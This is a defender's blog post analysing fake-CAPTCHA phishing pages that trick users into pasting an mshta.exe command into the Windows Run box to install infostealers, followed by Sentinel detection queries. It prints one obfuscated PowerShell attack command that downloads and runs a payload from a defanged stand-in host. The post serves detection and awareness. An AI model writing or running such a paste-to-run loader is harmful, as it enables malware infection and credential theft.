5 min read

The recent resurgence of malicious MSHTA activity.

Noticing a resurgence in phishing campaigns using fake CAPTCHA verification pages to distribute malware through abused mshta.exe commands. These attacks are leading to bypassed security controls and adversaries stealing sensitive data through infostealers like Lumma and Vidar stealer.

MSHTA.exe

A native windows binary which was designed to execute Microsoft HTML Application files (HTA) has recently jumped back into Red Canary's Top 10 Threat Detection Report in 2025 ranking #9th, the last time mshta.exe was seen in Red Canary's Threat Detection Report was in 2021 where it ranked #2nd overall for the technique T1218: Signed Binary Process Execution.

Using one of my favourite resources, typically used by red teams although it is helpful to see what a binary, library or script is capable of. LOLBAS, Living Off The Land Binaries, Scripts and Libraries project.

Searching for 'mshta' on LOLBAS we can see that the mshta.exe binary has functions Execute and Download, also listing the Mitre ATT&CK Techniques.

As mshta.exe is a legitimate, trusted and signed binary this makes it an appealing process for adversaries to exploit as they are able to proxy the execution of scripts in their campaigns for initial and later stages of infection, not to mention the binary can be manipulated to utilise evasion capabilities such as file extension spoofing - adversaries are able to disguise *.HTA files as *.MP4 files as well as command line obfuscation - these disguised files can contain obfuscated scripts that run PowerShell commands to deploy the Infostealer on the victim's host.

How they're baiting their hooks for phishing?

These campaigns have been observed using fake CAPTCHA verifications hosted on compromised or malicious websites. With user's being phished into clicking links that appear to be ranking high in search results through SEO (Search Engine Optimisation), malicious ads that are being displayed on legitimate websites and the age-old distribution through phishing emails.

I also want to note the prevalence of 'shop' top-level domains (TLD) hosting these malicious CAPTCHAs. They appear to be climbing drastically, this likely stems from a few advantages that align with modern adversary tradecraft.
Trust
User's associate the domain with e-commerce stores, this matched with the adversary typo-squatting domains like bvnnings.shop or the adversary just registering the correct spelling on trusted brands like babybunting.shop that have yet to claim their *.shop domain, mimicking the genuine retailer domain making it increasingly difficult for some users to differentiate. There are thousands of trusted ecommerce brands that are yet to purchase/secure their respective *.shop domains.
Cost
These TLD's cost less than a cup of coffee a year to register, this allows the adversary to churn through domains with a relative low outlay. Also to mention that these ecommerce brands could also secure and purchase the domain to potentially protect their customers from falling victim to these campaigns in the future.

The anatomy of the CAPTCHA

As mentioned above the user arrives on the malicious domain and is presented with what appears to be a typical CAPTCHA challenge, although this CAPTCHA challenge isn't your usual image recognition challenge.

When the user clicks on "I’m not a robot" they are presented with verification steps.

As you can see the user is prompted to complete the below steps;
1. Press Windows Button "⊞" + R
2. Press CTRL + V
3. Press Enter

Unbeknownst to the user in the background of the malicious website a JS (JavaScript) script has copied a malicious command to the user's computer clipboard.

As the user follows the "Verification Steps" they spawn the Run command window by completing step 1 "Pressing Windows Button "⊞" + R".

Run command window is launched, the user completes step 2 "Press CTRL + V".

The user pastes from their clipboard what may appear to some users as some sort of verification string ✅"I'm not a robot-reCAPTCHA Verification ID:8370””.

With the last step being "Press Enter".

The user has now become the victim, they have just used the Run command window to execute a malicious command that appeared as the below for the user.

"# ✅"I'm not a robot-reCAPTCHA Verification ID:8370””.

The command that user has just unknowingly run actually looked like the below example, with the comment appended to the end of the malicious command, if the user was to press the home key it would have displayed the start of the command.

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$A='hxxps[:]//malicious[.]com/file.mp4';Invoke-CimMethod -ClassName Win32_Process -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$A)}" # ''I'm not a robot-reCAPTCHA Verification ID:8370''

As you can see from the above, they used some basic obfuscation and variables storing the malicious payload value in the variable '$A', followed by the command line being invoked calling mshta.exe with 'ms' + 'hta' + '.exe ' and adding the payload with + $A.
This would then execute as 'mshta.exe hxxps[:]//malicious[.]com/file.mp4'.
The mshta.exe command fetches the HTA (HTML Application) file masquerading as a '.MP4' media file hosting the infostealer malware that is then deployed onto the victim's computer with further PowerShell obfuscation to prevent detection.

Detection and Defense

Detecting malicious mshta.exe activity through device process events and network connection logs can assist in the detection of this activity, but defending against these threats typically requires a layered strategy that includes behavioral analysis, endpoint monitoring, proactive threat hunting and user awareness training. Having a layered detection approach organisations can significantly reduce their exposure to these threats.

Sentinel/ADX Detection Queries

Detect mshta.exe launching uncommon processes
DeviceProcessEvents
| where Timestamp >now(-90d)
| where InitiatingProcessFileName =~ "mshta.exe"
| where InitiatingProcessCommandLine has "<script>"
or InitiatingProcessCommandLine has "http"
| project-reorder Timestamp, DeviceName, InitiatingProcessCommandLine, FileName

Detect mshta.exe beaconing to C2 Infrastructure
let ioc_watchlist = _GetWatchlist('ioc');
DeviceNetworkEvents
| where Timestamp >now(-7d)
| where InitiatingProcessFileName =~ "mshta.exe"
| where RemoteIP in (ioc_watchlist)
| project-reorder Timestamp, DeviceName, RemoteIP, InitiatingProcessCommandLine

Thoughts...
Despite the growing number of cybersecurity initiatives aimed at younger generations, elderly internet users remain significantly underserved in this area, even though they are often more vulnerable and have more to lose. While programs like Telstra's Digitalk and Safer Internet Day campaigns focus on educating children and teenagers about online safety and they do a great job at it, equivalent efforts for elderly internet users are scarce. This generational divide leaves older adults exposed to a growing array of cyber threats, such as phishing, tech support scams, and social engineering attacks, which exploit their limited digital literacy and trusting nature. Accumulated wealth, retirement savings and assets make them prime targets. Unlike younger users who are often more tech-savvy, older adults may lack the skills or confidence to identify scams or secure their devices. Cognitive challenges such as memory decline further increase their vulnerability.

Published by:

Joel Wadley